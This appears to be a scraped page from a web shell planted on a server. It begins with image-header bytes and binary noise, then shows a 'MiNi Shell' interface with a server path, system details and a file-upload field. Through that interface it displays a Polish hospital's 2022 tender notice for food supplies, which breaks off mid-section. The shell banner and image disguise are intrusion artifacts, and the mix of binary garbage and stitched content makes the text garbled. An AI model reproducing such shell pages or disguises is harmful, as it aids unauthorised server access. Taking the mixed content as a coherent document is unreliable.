JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221027/0041262201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów spożywczych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Szpital Kliniczny nr 1 w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431029234</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Staszica 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-081</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@spsk1.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://portal.smartpzp.pl/spsk1</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów spożywczych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eb867ec6-55cd-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00412622</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00175313/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.42 produkty spozywcze</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami,<br/>wszczególności składanie ofert oraz oświadczeń, odbywa się przy użyciu środków<br/>komunikacjielektronicznej zapewnionych przez system zapewniający obsługę procesu udzielania<br/>zamówieńpublicznych za pośrednictwem środków komunikacji elektronicznej, zwany dalej<br/>Systemem.3. Systemjest dostępny pod adresem: https://portal.smartpzp.pl/spsk1.4. Przeglądanie i<br/>pobieranie publicznejtreści dokumentacji postępowania nie wymaga posiadania konta w Systemie, ani<br/>logowania doSystemu.5. Za pośrednictwem posiadanego w Systemie konta Użytkownika<br/>Zewnętrznego odbywa siękomunikacja Wykonawcy z Zamawiającym w postępowaniu, w<br/>szczególności: przekazywaniedokumentów, oświadczeń, informacji, pytań, wniosków w ramach<br/>postępowania.6. Za pośrednictwemposiadanego w Systemie konta Jednostki Zamawiającej oraz kont<br/>jej Użytkowników Wewnętrznychodbywa się komunikacja Zamawiającego z Wykonawcą w<br/>postępowaniu, w szczególności:przekazywanie wezwań i zawiadomień, informacji, odpowiedzi na<br/>pytania.7. Zadawanie pytań przezWykonawców odbywa się w zakładce „Pytania do postępowania”. Po<br/>otwarciu ofert, komunikacjamiędzy Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia orazinformacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy, w zakładce„Korespondencja”, która dla Wykonawcy jest widoczna w Zakładce „Oferty”, po<br/>zaznaczeniu numeruzłożonej oferty. Za datę wpływu oświadczeń, wniosków, zaświadczeń oraz<br/>informacji przyjmuje się datęzapisania plików na serwerze. Aktualna data i godzina, zsynchronizowane<br/>z Głównym Urzędem Miar,wyświetlane są w prawym górnym rogu Platformy. 8. Do pełnego i<br/>prawidłowego korzystania zSystemu przez Użytkowników Zewnętrznych konieczne jest posiadanie<br/>przez co najmniej jednegouprawnionego Użytkownika Zewnętrznego Wykonawcy elektronicznego<br/>podpisu kwalifikowanego lubpodpisu zaufanego lub podpisu osobistego służącego do autentykacji i<br/>podpisu.9. Korzystanie zSystemu możliwe jest na 2 sposoby, pod warunkiem spełnienia następujących<br/>minimalnych wymagańtechnicznych:a) Oprogramowanie zewnętrzne (dostawcy podpisu<br/>kwalifikowanego):• Mozzilla Firefoxver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera<br/>ver. 58 i późniejsze, Microsoft Edgever 18 i późniejsze, Internet Explorer 11,• Lista zalecanych<br/>przeglądarek internetowych: GoogleChrome, Mozilla Firefox, Opera. Zalecane jest najnowszych wersji<br/>przeglądarek,• systemoperacyjny Windows 7 i późniejsze.b) Oprogramowanie<br/>wbudowane w SmartPZP:• zainstalowaneśrodowisko Java w wersji min. 1.8 (jre),• wprzypadkuprzeglądarek Opera, Chrome i Firefox<br/>należydoinstalować dodatek do przeglądarki Szafir<br/>SDK Web,•<br/>oprogramowanie SzafirHost w systemieoperacyjnym.13. W sytuacji awarii Systemu lub przerwy<br/>technicznej działania Systemu Zamawiającydopuszcza komunikację za pomocą poczty elektronicznej<br/>na adres: mzubala@spsk1.lublin.pl (niedotyczy składania ofert).14. Maksymalny rozmiar pojedynczych<br/>plików przesyłanych za pośrednictwemSystemu wynosi 100 MB. Za pośrednictwem Systemu<br/>możnaprzesłać wiele pojedynczych plików lubplik skompresowany do archiwum (ZIP) zawierający<br/>wiele<br/>pojedynczych plików.18. Dopuszczalneformaty przesyłanych danych tj. plików o wielkości do 100 MB w<br/>formatach .png, .jpg, .jpeg, .gif, .doc,.docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar,<br/>.7zip, .txt, .ath, .xml, .dwg, .xades, .tar,.7z, .eml, .msg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EO/EŻ-2738/38/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Aromat do ciast / różne zapachy - smaki op. min. 5 ml – max. 30 ml<br/>Bita śmietana spray 250 ml<br/>Biszkopty op. min. 0,12 kg – max. 0,30 kg<br/>Budyń błyskawiczny z cukrem (bez gotowania, o smaku śmietankowym, waniliowym) op. min. 0,03 kg - max 0,05 kg<br/>Czosnek mielony op.min. 0,04 kg- max. 0,10 kg<br/>Deser owocowy – przecier jabłkowy o konsystencji gładkiego, jednolitego i delikatnego musu, dla niemowląt po 4 miesiacu życia. Bez barwników i konserwantów. Produkt przygotowany z jednego rodzaju owoców (bez dodatku innych owoców) op. min. 0,12 kg – max. 0,20 kg <br/>Dżem z owoców, słodzony (różne owoce / smaki ) op. jednoporcjowe o wadze 25 gram (tj. 0,025 kg)<br/>Dżem z owoców, słodzony ( różne owoce /smaki) op. słoik min. 0,28 kg – max. 0,45 kg<br/>Galaretka owocowa / różne smaki , op min. 0,07 kg- max.0,10 kg<br/>Gałka muszkatołowa op. min. 0,01 kg- max. 0,10 kg<br/>Goździki op. min. 0,01 kg – max. 0,10 kg<br/>Herbata czarna, liściasta (gruby liść) typu Golden, Assam,Yunnan op.min. 0,10 kg - max. 0,50 kg<br/>Proponowany gatunek ...................................... *<br/>Herbata czarna, ekspresowa 1no porcjowa o wadze od 1,2 gram do 1,5 gram<br/>Herbatniki kruche bez dodatków ziaren, kakao, czekolady op. min. 0,05 kg- max.0,20 kg<br/>Imbir mielony op. min. 0,01kg-max. 0,10 kg<br/>Kakao naturalne (zawartość tłuszczu kakaowego min. 10%) op. min. 0,08 kg– max. 0,25 kg <br/>Kawa zbożowa rozpuszczalna (zboża min. 75%- jęczmień,żyto, cykoria) op. min. 0,10 kg- max. 0,50 kg <br/>Kisiel błyskawiczny z cukrem (bez gotowania, z kawałkami owoców, smak pomarańczowy, wiśniowy, cytrynowy) op.min. 0,03 kg – max. 0,05 kg <br/>Kisiel z cukrem, bez konserwantów (smak malinowy, truskawkowy, wiśniowy) op. min. 0,07 kg-max. 0,10 kg <br/>Koper suszony op. min. 0,10kg – max. 0,50kg<br/>Kotlety sojowe, produkt suchy, a‘ la schabowy, op. min. 0,10 kg – max. 0,50 kg <br/>Kostka sojowa, błyskawiczna op. min. 0,10 kg – max. 0,50 kg<br/>Krakersy , różne smaki op. min. 0,10 kg – max. 0,50 kg<br/>Kwasek cytrynowy, op. min. 0,10 kg – max. 1 kg<br/>Liście laurowe, op. min. 0,10 kg – max. 0,50 kg<br/>Majeranek, op. min. 0,02 kg – max. 0,10 kg<br/>Margaryna w kostce (min. 70 % tłuszczu, typu Kasia, Maryna ) op. Min. 0,25 kg - max.1 kg <br/>Masa makowa z bakaliami , op. min. 0,80 kg – max. 1 kg<br/>Mieszanka ziół do kurczaka, op. min. 0,02 kg – max, 0,20 kg<br/>Mieszanka ziół do ryb , op. min. 0,02 kg – max. 0,20 kg<br/>Miód naturalny wielokwiatowy, op. 1no porcjowe o wadze 25 gram (0,025kg)<br/>Natka pietruszki, suszona , op. min. 0,10 kg – max. 0,50 kg<br/>Ocet w plastikowym opakowaniu op. min. 0,5 L – max.1 L<br/>Oliwa z oliwek extra Virgin, op. min. 0,5L – max. 1 L<br/>35.	Olej uniwersalny do sałatek i smażenia, op. min. 0,5L – max. 2L<br/>36.	Paluszki z sezamem lub makiem, op. min. 0,07kg – max. 0,10 kg<br/>37.	Papryka mielona (łagodna i ostra), op. min. 0,02 kg- max. 0,10 kg<br/>Pieczywo bezglutenowe (skład: mąka ryżowa, grysik ryżowy, mąka kukurydziana itp.), op. min.0,10kg – max. 0,40 kg<br/>Pieczywo chrupkie kukurydziano-ryżowe bez dodatku cukru, glutenu) , op. min. 0,10 kg - max. 0,40 kg<br/>Pieczywo wieloziarniste, (chrupkie lub lekkie, skład: pęłnoziarnista mąka żytnia, maka pszenna, otręby ) op. min. 0,10kg – max. 0,40 kg <br/>Pieprz naturalny czarny (mielony), op. min. 0,05kg – max. 0,10 kg<br/>Pieprz ziołowy (mielony) , op min. 0,05 kg –max. 0,10 kg<br/>Pierniczki w czekoladzie (czekolada min. 17%), op .min. 0,10kg – max. 1 kg<br/>Proszek do pieczenia, op. min. 0,03 kg – max. 0,05 kg<br/>Przyprawa w płynie, typu „Maggi“ do zup, sosów, op. min. 0,50 L- max. 2L<br/>Przyprawa warzywna w proszku typu Domowa, Vegeta, Ziarenka smaku) op. min. 0,10 kg. - max 1 kg<br/>Przyprawa ziołowa (mieszanka ziół: bazylia, majeranek, rozmaryn, szałwia, cząber, oregano, tymianek,mięta np. zioła prowansalskie ), op. min. 0,01kg – max. 0,20 kg<br/>Rosół drobiowy (w proszku) , op. min. 0,50 kg – max. 3 kg<br/>Rozmaryn suszony, op. min. 0,01kg – max. 0,20 kg<br/>Sok jabłkowy, (karton ze słomką), op. min. 0,20L -max. 0,30 L<br/>Sok owocowo-warzywny w opakowaniu plastikowym, (z cukrem, z dodatkiem marchwi, dyni, jabłka, bananów, winogron np Kubuś), op. min. 0,30L – max. 0,40L<br/>Sok pomidorowy, op. min.0,30 L – max. 0,40 L<br/>Sos sałatkowy uniwersalny, (skład: przyprawa ziołowa, cebula, liść pietruszki, oregano, majeranek, pieprz czarny, bazylia, tymianek, pieprz ziołowy) sos w proszku), op. min. 0,10 kg – max. 1 kg<br/>Sól kuchenna warzona op. max 1 kg<br/>Soda oczyszczana, spożywcza op. min. 0,07 kg – max. 0,10 kg<br/>Tymianek suszony, op. min. 0,01 kg - max. 0,20 kg<br/>Wafle w czekoladzie (wafel przekładany kremem -różne smaki, oblany czekoladą min. 30%) , op. min. 0,03 kg – max. 0,05 kg<br/>Ziele angielskie , op. min. 0,01kg – max. 0,20 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy cząstkowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cukier kryształ op. min 1 kg – max 5 kg<br/><br/>Cukier biały w paluszkach op. min. 4 g – max. 5 g<br/><br/><br/>Cukier puder op. min. 0,40 kg – max. 1 kg<br/><br/><br/>Cukier waniliowy op. min. 0,03 kg – max. 0,05 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy cząstkowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Fasola sucha – Jaś średni op. min. 0,50 kg - max. 5 kg<br/><br/><br/>Groch łuskany, suchy op. min. 0,50 kg - max. <br/>5 kg<br/><br/><br/>Kasza gryczana, cała, prażona, jasna op. min. <br/>1 kg -max. 5 kg<br/><br/>Kasza kukurydziana op. min. 0,50 kg -max. 1 kg<br/><br/><br/>Kasza jaglana op. min. 1 kg – max. 5 kg<br/><br/><br/>Kasza jęczmienna średnia op. min. 1 kg - max. 5 kg<br/>Kasza manna op. min. 1 kg - max. 5 kg<br/><br/>Makarony z mąki durum, rózne kształty op. min. 0,50 kg- max. 5 kg (kształt:, łazanka - 10% gruba nitka – krajanka (grubości 5 mm) – około 30%, świderki – około 20%, rurka skośna (pióra)- około 20%, spaghetii (tradycyjne) - około 20%)<br/>Makaron razowy, różne kształty, op.min. 0,50 kg – max. 5 kg (kształt: ,łazanka-10% gruba nitka – krajanka (grubości 5 mm) – około 30%, świderki – około 20%, rurka skośna (pióra) - około 20%, spaghetii (tradycyjne) - około 20%)<br/>Makaron bezglutenowy, różne kształty op. min.0,20 kg – max 1 kg (kształt:, łazanka - 10% gruba nitka – krajanka (grubości 5 mm) – około 30%, świderki – około 20%, rurka skośna (pióra) - około 20%, spaghetii (tradycyjne) - około 20%)<br/><br/>Mąka ziemniaczana, op. min. 0,50kg – max. 1 kg<br/><br/><br/>Płatki jaglane (błyskawiczne) , op. min. 0,50 kg - max.1 kg<br/><br/><br/>Płatki jęczmienne (błyskawiczne), op. min. 0,50 kg – max. 1 kg<br/><br/><br/>Płatki kukurydziane (śniadaniowe, zwykłe bez dodatków (bez gotowania), op. min. 0,20 kg – max. 1 kg<br/><br/><br/>Płatki owsiane (błyskawiczne) , op. min. 0,50 kg - max. 1 kg<br/><br/><br/>Ryż (biały, cały, długi), op. min. 1 kg – max. 5 kg<br/><br/><br/>Ryż naturalny, brązowy, op. min. 1 kg – max. 5 kg<br/><br/><br/>Soczewica zielona, ziarno, op. min. 0,50 kg - max. 5 kg<br/><br/><br/>Soja ziarno, op. min. 0,50 kg – max. 1 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, 